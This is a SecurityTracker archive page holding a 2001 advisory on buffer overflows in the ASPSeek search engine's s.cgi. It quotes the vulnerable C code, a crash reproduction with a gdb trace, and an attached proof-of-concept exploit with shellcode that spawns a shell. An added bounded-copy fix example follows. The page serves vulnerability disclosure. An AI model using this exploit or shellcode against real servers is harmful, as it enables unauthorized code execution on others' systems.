SecurityTracker
Archives
Category:   Application (Web Server/CGI)  >   ASPSeek
Vendors:   SWsoft
ASPSeek CGI-based Search Engine May Execute Arbitrary Code Supplied By Remote Users
SecurityTracker Alert ID:  1001115
SecurityTracker URL:  http://securitytracker.com/id/1001115
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 19 2001
Impact:   Execution of arbitrary code via network
Fix Available:  Yes  
Version(s): v1.0.0 through v1.0.3
Description:   There is a vulnerability in the ASPSeek search engine CGI code, as reported today. This buffer overflow vulnerability allows remote users to execute code on the server.

ASPSeek is a compiled, CGI-based search engine that uses a MySQL database as its data store. The "s.cgi" program performs input and output for the search engine, but does not bounds-check user-supplied data before copying it into fixed-size buffers. There are reportedly multiple buffer overflow conditions in s.cgi. Additional details are provided in the original source message.

Impact:   A remote user could send an improperly formatted request to the "s.cgi" search engine cgi that causes the server to execute arbitrary code, which could be used to grant the user a shell with the privileges of the web server (typically "nobody" privileges).
Solution:   The vendor apparently provides a patch.
Vendor URL:  www.aspseek.org
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (FreeBSD)

Message History:   None.


Source Message Contents

Subject:  Aspseek Buffer Overflow


Product: Aspseek Search Engine.
Vendor URL: www.aspseek.org
Tested on: v1.0.0 -> v1.0.3 [Freeware] Linux
Vendor Contact: Mailed on 8th March NO Reply Vendor Patched though

|-- The Problem, ----------------------------------------------------------------------|
                The Aspseek Search Engine is like many other C/C++ Compiled search
engines, and uses a MySQL database as its data store.

     "Our stable releases are really stable" - aspseek development team

-Overview,
Once compiled and properly set up, you are left to copy s.cgi to the cgi-bin
of your webserver. This script acts as the input and output for the search engine,
taking user-defined data and outputting the search results. Unfortunately there is a
problem in the parsing of user-defined data.

-/Overview

-Detail,
                There are multiple buffer overflow conditions in s.cgi, the first being the
most obvious:

1.
         sc.cpp:
             int search(char *exe, char *arg) {
             ==>
                if ((env = getenv("QUERY_STRING")))
                {
                    strcpy(query_string, env);
                    ....
                }
             <==
             }

             Where query_string is defined as: query_string[STRSIZ] = query_string[4 x 1024]

             Through experimentation I found that it would take at least 10272 chars to
             overflow this buffer, therefore making it useless remotely, since Apache by
             default will only take a URI of 8190 bytes in length.

2.
         templates.cpp:
             int CCgiQuery::ParseCgiQuery(char* query, char* templ) {
             ==>
                  else if (!STRNCMP(token, "tmpl="))
                  {
                       char* tmpl = token + 5;
                       char tmplu[2000];
                       sprintf(tmplu, "&tmpl=%s", tmpl);
                       ....
                  }
             <==
             }

             The above condition is a classic buffer overflow; I found that the buffer can
             be overflowed with 5148 bytes of data, therefore making this remotely
             exploitable.

             Example,

             [root@linux cgi-bin]# export QUERY_STRING="q=a&tmpl=`perl -e'printf("a"x5200)'`"
             [root@linux cgi-bin]# ./s.cgi

             Content-type: text/html

             <html><body>Can't open template file 'aaaaa...............'!</body></html>
             Segmentation Fault (core dumped)

             [root@linux cgi-bin]# gdb s.cgi core

             GNU gdb 5.0
             Copyright 2000 Free Software Foundation, Inc.
             GDB is free software, covered by the GNU General Public License, and you are
             welcome to change it and/or distribute copies of it under certain conditions.
             Type "show copying" to see the conditions.
             There is absolutely no warranty for GDB.  Type "show warranty" for details.
             This GDB was configured as "i386-asplinux-linux"...
             Core was generated by `./s.cgi'.
             Program terminated with signal 11, Segmentation fault.

             #0  0x61616161 in ?? ()

-/Detail

|-- Exploit, ----------------------------------------------------------------------------|
To demonstrate the problem I have supplied a local exploit which
simply drops s.cgi to a shell. This condition is exploitable remotely and could be
used to obtain a remote uid=nobody shell.

|-- Solution, ---------------------------------------------------------------------------|
             Vendor provides a patch @ aspseek.org, strange though I got no reply??

|-- Credits, ---------------------------------------------------------------------------|

        Asp Group -  producers of Asplinux & Aspseek, for making Asplinux the
                             weirdest distro I have ever used.
        mjm   - muench@gmc-online.de, the fastest mail replier ever :)
        all @alldas.de
_________________________________________________________________

NeilK (neil@alldas.de/neilk@alldas.de)
www.alldas.de

             "Regulation of Investigatory Powers Act (RIP)
                     Communism in the UK since Oct 2000"
                                            http://www.stand.org.uk



Attachment: aspseek-xploit.c

/*
 * Aspseek v1.0.0 - 1.0.3 -Proof of Concept eXploit-
 * Tested on Redhat 7.0, Asplinux RC3 (v1.1)
 *
 * by:  NeilK (neilk@alldas.de/neil@alldas.de)
 *	http://neilk.alldas.de
 *
 * 	Local proof of concept buffer overflow exploit for s.cgi
 *	its not suid/sgid but it can be remote :)
 *
 *	Line #1228 - templates.cpp
 *		char* tmpl = token + 5;
 *		char tmplu[2000];
 *		sprintf(tmplu, "&tmpl=%s", tmpl)
 *
 * greetz: mjm, all @alldas.de
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>   /* execl */

#define NOP 0x90
#define BUFSIZE 5148
#define OFFSET -200
#define RETURNS 2

unsigned char shellcode[] =
	"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
	"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

long get_sp () { __asm__ ("mov %esp, %eax"); }

int
main (int argc, char *argv[])
{
	char buffer[BUFSIZE + 1];   /* +1: the terminating NUL is written at buffer[BUFSIZE] below */
	int i, offset;
	unsigned long ret;

	fprintf(stderr, "Aspseek v1.0.3 -Proof of Concept eXploit-\n");
	fprintf(stderr, "by neilk@alldas.de/neil@alldas.de\n");

	if (argc > 1)
		offset = atoi(argv[1]);
	else
		offset = OFFSET;

	memcpy(buffer, "q=a&tmpl=", 9);
	for (i = 9; i < (BUFSIZE - strlen(shellcode) - (RETURNS*4)); i++)
		*(buffer + i) = NOP;

	memcpy (buffer + i, shellcode, strlen(shellcode));

	ret = get_sp();

	for (i = BUFSIZE - (RETURNS*4); i < BUFSIZE; i += 4)
		*(long *) &buffer[i] = ret+offset;

	buffer[BUFSIZE] = '\0';

	fprintf(stderr, "[return address = %p] [offset = %d] [buffer size = %d]\n", ret + offset, offset, strlen(buffer));

	setenv("QUERY_STRING", buffer, 1);

	execl("./s.cgi", "s.cgi", NULL);
	exit(1);
}
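As an added example, not ASPSeek's code and not part of NeilK's message, here are bounded replacements for the two unbounded copies named in the Detail section above (the strcpy of QUERY_STRING into query_string[4*1024] and the sprintf of "&tmpl=%s" into tmplu[2000]), with the 5200- and 10272-byte inputs from the advisory rejected instead of overflowing. The buffer sizes come from the advisory; the function names and the constructed inputs are assumptions of this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define STRSIZ (4 * 1024)   /* query_string[STRSIZ] in sc.cpp, per the advisory */
#define TMPLU_SIZE 2000     /* tmplu[2000] in templates.cpp, per the advisory */

/* Bounded replacement for strcpy(query_string, getenv("QUERY_STRING")): copy
 * only when the string plus its NUL fits, else reject (0 = ok, -1 = too long). */
int copy_query_string(char *dst, size_t dstsz, const char *env)
{
    size_t n = env ? strlen(env) : dstsz;   /* a missing variable is rejected too */
    if (n >= dstsz)
        return -1;
    memcpy(dst, env, n + 1);
    return 0;
}

/* Bounded replacement for sprintf(tmplu, "&tmpl=%s", tmpl): snprintf returns
 * the length it wanted to write, so n >= dstsz means the value did not fit.
 * Refuse it rather than continue with a silently truncated template name. */
int build_tmpl_param(char *dst, size_t dstsz, const char *tmpl)
{
    int n = snprintf(dst, dstsz, "&tmpl=%s", tmpl);
    if (n < 0 || (size_t)n >= dstsz) {
        dst[0] = '\0';
        return -1;
    }
    return n;
}

/* Feed either check a constructed value of `len` 'a' bytes, the shape of the
 * advisory's PoC input; which == 0 tests the query copy, 1 the tmpl build. */
int try_len(int which, size_t len)
{
    char query[STRSIZ], tmplu[TMPLU_SIZE], *v = malloc(len + 1);
    int r;
    memset(v, 'a', len);
    v[len] = '\0';
    r = which ? build_tmpl_param(tmplu, sizeof tmplu, v)
              : copy_query_string(query, sizeof query, v);
    free(v);
    return r;
}

int main(void)
{
    printf("5200-byte tmpl value: %d\n", try_len(1, 5200));   /* -1: rejected */
    printf("10272-byte query:     %d\n", try_len(0, 10272));  /* -1: rejected */
    return 0;
}
```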




Copyright 2019, SecurityGlobal.net LLC